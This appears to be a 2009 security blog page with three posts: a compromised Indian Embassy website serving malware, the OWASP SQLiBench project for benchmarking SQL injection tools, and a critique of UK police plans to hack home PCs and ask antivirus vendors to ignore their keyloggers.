Thursday, January 29, 2009

Indian Embassy in Spain spreading malware

| Armando Romeo |
The kind Ismael Valenzuela reported to me an interesting incident happened to Indian Embassy in Spain website. It seems that the website has been compromised and pieces of malware code are being downloaded from three different places.

The researcher has contacted the Embassy but no response received so far.
You can find a more in depth analysis of the incident here
Thanks goes to Ismael for his finding and reporting

Tuesday, January 13, 2009

SQLiBENCH - Benchmarking tool for sqli injectors

| Armando Romeo |
SQL Injection exploitation is one of the (most important?) steps of a web application testing endeavours.
There are many tools around. Each with its unique feature. Each with its area of use.

What are the discriminating factors in actual sql injection tools? :
  • DBMS fingerprinting and support
    Some tools are capable to deal with with just a few version of the same DBMS others
    are capable of dealing with different DBMS
  • Speed in terms of number of requests required to achieve a given task (dump table, dump rows, gain privileges, read / write files...)
Techniques to exploit this kind of vulnerability have been refined to decrease the number of requests to web server at a minimum thus optimizing time consumed dumping and maximize results. There's no killer application here. Not a single tool that you can use for all of the DBMS, so far.

But at least we have SQLiBench. An OWASP powered project that aims at, guess what?, benchmark these tools.

The goal of the project is to create a detailed set of benchmarking criteria for automatic sql injection tools and applying these to a set of open source sql injectors, producing analysis/benchmarking reports. Additionaly, in a semi-academic manner, algorithms used by targeted sql injectors will be analyzed both implementation and complexity vise.

This is an extract of the great Tools Benchamarked matrix available here:

SQLiBench project page is here

Monday, January 12, 2009

Police Backdoors

| Yash Kadakia |
I ran across this article titled "Police set to step up hacking of home PCs" the other day. It details a new law approved by the UK government allowing police to hack into suspected home computers. In-order to carry out these Hacks, they will be sending E-mails with virus attachments or breaking into homes and installing keystroke loggers.

This kind of behavior is displayed by most governments these days. However, what did surprise me is that they asked security product/service providers to stop detecting/blocking their keystroke loggers and other malicious tools.

I was glad to read that a few security vendors have taken issue and denied cooperation with this matter. As per ZDNet, security vendors Kaspersky Labs and Sophos told ZDNet UK that they would not make any concession in their protective software for the police hack.

Symantec declined to comment on whether it would block a police hack, saying the matter was "politically sensitive". However, the security vendor has said in the past that it would not scan for the FBI's Magic Lantern keystroke-logging software.

I personally think the entire concept is ridiculous, especially the part where security vendors are expected to turn a blind eye to these police hacks. I feel that an AV that would voluntarily miss malicious code used for these police hacks would probably as a direct result miss other malicious code also.

Also, If any malicious users or malware authors were to get their hands on this malicious police code (which is fairly likely since they are installing it on suspect PCs), it would be fairly easy to reverse engineer the code and create malware to mimic its behavior and bypass security software.

Security through obfuscation, i.e. with the hope that no-one will look there, or look deep enough is always a bad idea. The entire concept of asking Vendors to create police backdoors sounds to me like a malformed version of "Security through obfuscation".

Originally from: Yash Kadakia's Indian IT Security Blog

Free Security Magazines